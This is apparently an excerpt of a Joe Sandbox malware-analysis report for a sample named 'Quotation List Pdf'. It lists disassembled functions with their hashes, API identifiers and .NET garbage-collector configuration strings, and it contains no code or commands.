                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: CurrentExceptionFailFastQueryRaiseThreadVirtual
                                                      • String ID:
                                                      • API String ID: 2131581837-0
                                                      • Opcode ID: c64ecd0e409d3fcf1060a1dc3232f901697416edb1e454c4f82bff6a62ba27d3
                                                      • Instruction ID: b32682b826cc4264c7653a22068be22ca43ca84618c91e12c695758c55f5a845
                                                      • Opcode Fuzzy Hash: c64ecd0e409d3fcf1060a1dc3232f901697416edb1e454c4f82bff6a62ba27d3
                                                      • Instruction Fuzzy Hash: 02113A72908B8182EA64EF26E4051AAF750FB457B0F944339E6BD076D6DF38D5468704
                                                      Function 00007FF768442EA0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: FreeVirtual
                                                      • String ID:
                                                      • API String ID: 1263568516-0
                                                      • Opcode ID: c77d0b216ed602b1f63c297f10537e1da20961e91553004aa9498b52e676b055
                                                      • Instruction ID: 35a63cb78e94622acd83a5af9ac89f9fd4fb62287b3dc19ee7a9056377c33782
                                                      • Opcode Fuzzy Hash: c77d0b216ed602b1f63c297f10537e1da20961e91553004aa9498b52e676b055
                                                      • Instruction Fuzzy Hash: C5B01204F1A011C2E30437237CC2B0C42142F09B12FC40028C608A1350CD2C81E51F35

                                                      Non-executed Functions

                                                      Function 00007FF768443130 Relevance: 123.1, Strings: 98, Instructions: 569COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCDTargetTCP$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCPath$GCProvModeStress$GCRegionRange$GCRegionSize$GCSpinCountUnit$GCTotalPhysicalMemory$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$MaxHeapCount$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DTargetTCP$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LOHThreshold$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.Name$System.GC.NoAffinitize$System.GC.Path$System.GC.RetainVM$System.GC.Server
                                                      • API String ID: 0-1379766591
                                                      • Opcode ID: d99b99d8d7d8079bc8fcfdef839217da97d7cae1de85db9ed7a85a6efaf86363
                                                      • Instruction ID: 4501e2e77913fa773e04c953ddd829dea260c5f93129bf0246e31ff378972413
                                                      • Opcode Fuzzy Hash: d99b99d8d7d8079bc8fcfdef839217da97d7cae1de85db9ed7a85a6efaf86363
                                                      • Instruction Fuzzy Hash: 0E425F71608A56C2FB20AB15F850AA9E3A6FF497C8FC55132D98C07B25DF3CD21AC758
                                                      Function 00007FF768443EF0 Relevance: 113.0, Strings: 90, Instructions: 479COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: strcmp
                                                      • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCDTargetTCP$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCMaxHeapCount$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCSpinCountUnit$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DTargetTCP$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LOHThreshold$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
                                                      • API String ID: 1004003707-1492036319
                                                      • Opcode ID: 4191eb02c31c6530e6ec1d622d11567a61af9ffd1ff6ecc5b188b8cc01225dc0
                                                      • Instruction ID: a1cf7237fa49be065fa629657daa09050e1818609089fa7e35e125b2420fe803
                                                      • Opcode Fuzzy Hash: 4191eb02c31c6530e6ec1d622d11567a61af9ffd1ff6ecc5b188b8cc01225dc0
                                                      • Instruction Fuzzy Hash: A8627060D0DA87D0FA00FB66E8515A5EBE3AF69788FC44136C44D47273DE6CA169C3B8
                                                      Function 00007FF768442F60 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
                                                      • String ID: SeLockMemoryPrivilege
                                                      • API String ID: 1752251271-475654710
                                                      • Opcode ID: 15b15ab6d6ee02b3c5b0b81b0fa05c43a8a43f1a4b1e1b9cf4b9317159724ae4
                                                      • Instruction ID: 9dfa5847cf3c8c8279e2bdcbf7affefc44b144504dd6a51bf57a1eab24f6673b
                                                      • Opcode Fuzzy Hash: 15b15ab6d6ee02b3c5b0b81b0fa05c43a8a43f1a4b1e1b9cf4b9317159724ae4
                                                      • Instruction Fuzzy Hash: 4931A631A1CA42C6FB20AFA1E44477AE7A1EF84B84F844139DA4D0775ADF7DD4488F24
                                                      Function 00007FF768436ED0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 245COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF768437871), ref: 00007FF768436F88
                                                      • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF768437871), ref: 00007FF7684370DB
                                                      • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF768437871), ref: 00007FF7684371B3
                                                      • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF768437871), ref: 00007FF7684371C9
                                                      • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF768437871), ref: 00007FF768437245
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFailFastRaise
                                                      • String ID: [ KeepUnwinding ]
                                                      • API String ID: 2546344036-400895726
                                                      • Opcode ID: a194a7c0d0f8bf0d13eda8b02fc6739eea9f927413269e725c7a1e9c4323ee48
                                                      • Instruction ID: 1257da521ae59b097a6387879aee392e978579f5f1d6fd4b79212c255914c8f0
                                                      • Opcode Fuzzy Hash: a194a7c0d0f8bf0d13eda8b02fc6739eea9f927413269e725c7a1e9c4323ee48
                                                      • Instruction Fuzzy Hash: 7AB15B32A09B42C2EB94EF22D4802A9FBA1FF44B88F984136DE8D17394DF39D455C764
                                                      Function 00007FF76849BA10 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                      • String ID:
                                                      • API String ID: 2933794660-0
                                                      • Opcode ID: 78dc8e12354e733f786b704134a88d0c69524484bd1249ff473f58f1b1045164
                                                      • Instruction ID: bb1c1dc350dd8ea9bff98dc91c01cbadc17ea90c3bdf7c1acd785076f82ab97a
                                                      • Opcode Fuzzy Hash: 78dc8e12354e733f786b704134a88d0c69524484bd1249ff473f58f1b1045164
                                                      • Instruction Fuzzy Hash: 47117022B54F02CAFB00EF60E8542B9B3A4FB18758F840E35DA2D467A4DF7CD1588760
                                                      Function 00007FF7684631E0 Relevance: 4.8, APIs: 3, Instructions: 256threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: SwitchThread
                                                      • String ID:
                                                      • API String ID: 115865932-0
                                                      • Opcode ID: 9c30da41b46e678a752cba94ff24b9c9e844bb868ff036e56f0bec62d5d1427a
                                                      • Instruction ID: 155445faf967ae3bc53b9721e0e7b122897c29c733bbc205558e7ebfd0ce8f95
                                                      • Opcode Fuzzy Hash: 9c30da41b46e678a752cba94ff24b9c9e844bb868ff036e56f0bec62d5d1427a
                                                      • Instruction Fuzzy Hash: 0FB17CB1E09A82C6EB54AF24D4443B8F7A1FF04B98F844536DA1D57396DF3CE49083A8
                                                      Function 00007FF76844D620 Relevance: 4.7, APIs: 2, Strings: 1, Instructions: 195COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID: @
                                                      • API String ID: 3168844106-2766056989
                                                      • Opcode ID: 5db7b6a377614d9f480f265109a2fe80749a182d1a3adcd727705f5ae378369e
                                                      • Instruction ID: 14d64f5e585d054362f6ea03f9a1bd0125e949ee31136982cdd79712b7f1d245
                                                      • Opcode Fuzzy Hash: 5db7b6a377614d9f480f265109a2fe80749a182d1a3adcd727705f5ae378369e
                                                      • Instruction Fuzzy Hash: 3F914A21E1C642C1FB60BF15E844379EBA2EF44B88F980435D91D976AADE2CF484C778
                                                      Function 00007FF76846E8E0 Relevance: 3.3, APIs: 2, Instructions: 344threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: SwitchThread
                                                      • String ID:
                                                      • API String ID: 115865932-0
                                                      • Opcode ID: c2dd94c7d96df3f2775cdd799debc1e0e9d9a61e5e2074260edde2e60430f6ac
                                                      • Instruction ID: f37e6cfae3736b2ea820a0f26b024879dd74ef1b6eb1572f5f62d1c586309eeb
                                                      • Opcode Fuzzy Hash: c2dd94c7d96df3f2775cdd799debc1e0e9d9a61e5e2074260edde2e60430f6ac
                                                      • Instruction Fuzzy Hash: 4FE19372A09A81C6EB60DF15E8803A9FBA1FF44B94FA44131DA5D53789DF3CE481C768
                                                      Function 00007FF768442080 Relevance: 3.2, APIs: 2, Instructions: 175COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF76843828B,?,?,?,?,?,?,00007FF768432000), ref: 00007FF76844211F
                                                      • GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF76843828B,?,?,?,?,?,?,00007FF768432000), ref: 00007FF76844217C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: EnabledFeaturesState
                                                      • String ID:
                                                      • API String ID: 1557480591-0
                                                      • Opcode ID: 72210cc46d501d66917d4aa4741235ebaad592b546a2f8b3c708735d4c7245cd
                                                      • Instruction ID: 751df0d15d9356d66a26a92e5e8f48ac366c314f6ec93c897df0574b7defbded
                                                      • Opcode Fuzzy Hash: 72210cc46d501d66917d4aa4741235ebaad592b546a2f8b3c708735d4c7245cd
                                                      • Instruction Fuzzy Hash: 0251D332F0823382FF6858599459335CA87AFE9350FCA8538DA5FD32C2CD7EA8464128
                                                      Function 00007FF76845C7D0 Relevance: 2.6, APIs: 2, Instructions: 100COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3168844106-0
                                                      • Opcode ID: d59cc5cb1b18531cba8ca60925d5e3cb69ecf232ff52c5df66362fa8286c3256
                                                      • Instruction ID: 81ce64e3542a559dcb858a63b66df71697b845ec69e0179ece1aa64f8da95465
                                                      • Opcode Fuzzy Hash: d59cc5cb1b18531cba8ca60925d5e3cb69ecf232ff52c5df66362fa8286c3256
                                                      • Instruction Fuzzy Hash: CD419C22B18A96C1FB10AF26D54017DEBA1FF48BC4F885136DE4C57A5ADF3CE0118768
                                                      Function 00007FF768464B10 Relevance: 1.8, Strings: 1, Instructions: 564COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: d80cb2096afa2d96802b29f732793f8d2c2ea0a515708a2f5b61d075e09ca355
                                                      • Instruction ID: a32e3d36d8a9578299febb3bb943ac1437feac3fb4ebe5567e164162b95bee25
                                                      • Opcode Fuzzy Hash: d80cb2096afa2d96802b29f732793f8d2c2ea0a515708a2f5b61d075e09ca355
                                                      • Instruction Fuzzy Hash: 36429472A19A86C1EA60AF15E450278FBA1FF45BE4F854632CA6D177D1CF3CE490C368
                                                      Function 00007FF7684502A0 Relevance: 1.7, Strings: 1, Instructions: 441COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ?
                                                      • API String ID: 0-1684325040
                                                      • Opcode ID: d973c782404e594d9bcbf2e5c6d56061f7dad822c0a4488c5f43b24ac340032d
                                                      • Instruction ID: fdb0777f88e33801dcd5281add4cb428cb27d1403895b9e4682544e88f17cd9c
                                                      • Opcode Fuzzy Hash: d973c782404e594d9bcbf2e5c6d56061f7dad822c0a4488c5f43b24ac340032d
                                                      • Instruction Fuzzy Hash: 2112AB36A08A86C2EA10EF11E4447ADEBA5FF85B98F944232CE5D43794DF3CE085C758
                                                      Function 00007FF76843BF90 Relevance: 1.6, Strings: 1, Instructions: 362COMMON
                                                      Download Yara Rule
                                                      Strings
